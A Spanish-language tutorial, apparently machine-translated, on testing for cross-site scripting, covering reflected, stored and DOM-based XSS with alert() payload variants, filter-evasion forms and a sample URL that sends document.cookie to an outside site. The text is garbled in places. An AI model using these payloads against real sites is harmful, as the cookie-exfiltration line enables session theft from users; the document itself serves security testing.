Pruebas de seguridad - Ataque de secuencias de comandos entre sitios (xss)

  
Las secuencias de comandos entre sitios son una vulnerabilidad de seguridad relativamente importante y común en la seguridad. Las secuencias de comandos entre sitios se refieren a la entrada de código malicioso. Si el programa no verifica la entrada y la salida, el atacante controlará el navegador. Se pueden obtener las cookies de los usuarios, el sistema y la información del navegador, y guardar xss también se puede usar para el phishing para obtener más información del usuario. El método más común de secuencias de comandos entre sitios, ingrese < Script > alert (1) < /script > y sus diversas variantes < script > alert (1) < /script > entity% 3Cscript% 3Ealert (1 % 3C /script% 3E codificación de URL < scr < script > ipt > alert (1) < scr < script > ipt > < script x = 1 > alert (1) < /script x = 1 > Escriba de esta forma o < script > confirm (1) < /script > < javascript.: Alert (1) >; etc. Si la página aparece con un cuadro de alerta después de la presentación, la página tiene la vulnerabilidad xss * reflectivo xss popular Hablando, incluso si ingresa un fragmento de código, puede ver el efecto real del código, no el efecto del programa original: un fragmento de código < html > < body > < script > document.write (location.search); < /La secuencia de comandos > //location.search devuelve la url? La parte inicial de < /body > < /html > al ingresar la siguiente url " http: //127.0.0.1/attrck.html? Search = 222 " la página mostrará:? Search = 222; pero si ingresa /? Search = < Script > alert (1) < /script > en la url, el código real de la página es: document.write (? Search =) < Script > alert (1) < /script >; aparecerá un cuadro de advertencia, es decir, se ejecuta el código < Script > alert (1) < /script > no se muestra la página originalmente. El efecto de la cadena de correos puede usar la url forjada Obtenga la cookie del usuario, por ejemplo, agregue document.cookie = (" nombre = 123 "); en el ejemplo 1, configure la cookie y luego construya la url de la siguiente manera para implementar la cookie del dominio localhost que se pasará y busque http://127.0.0.1 /attrck.html?search=<script>window.open("http://www.baidu.com/s?wd="+document.cookie) < /script > Debido a que las cookies están prohibidas al acceso de varios dominios , pero las URL forjadas, los navegadores se considerarán dominios de host local * El archivo xss guardado significa que se guarda el código malicioso en el servidor, como la publicación de un artículo que contiene código malicioso; otros usuarios ejecutarán scripts maliciosos cuando naveguen * basado en dom xss Estrictamente hablando, xss también es reflexivo. El ejemplo de este artículo también se basa en dom, que se refiere a modificar el modelo de objeto dom de la página para lograr un ataque. Por ejemplo, la página utiliza el método dom como document.write \\ document.writeln \\ innerhtml. Dom basado en xss, encuentra xss una vulnerabilidad El uso general de la entrada manual, debe tener en cuenta las restricciones de entrada, el filtrado, las restricciones de longitud y otros factores, por lo que debe diseñar una variedad de entradas variables para lograr los resultados de la prueba, también puede usar herramientas, como burstisuite para obtener la solicitud y modificar manualmente los parámetros de la solicitud. Luego, vuelva a enviarlo al navegador para realizar la prueba, ya que xss no está limitado a la entrada de la página visible, y puede que estén ocultos campos de formulario, obtener parámetros de solicitud, etc. Este artículo proviene de [System Home] www.xp85.com
Copyright © Conocimiento de Windows All Rights Reserved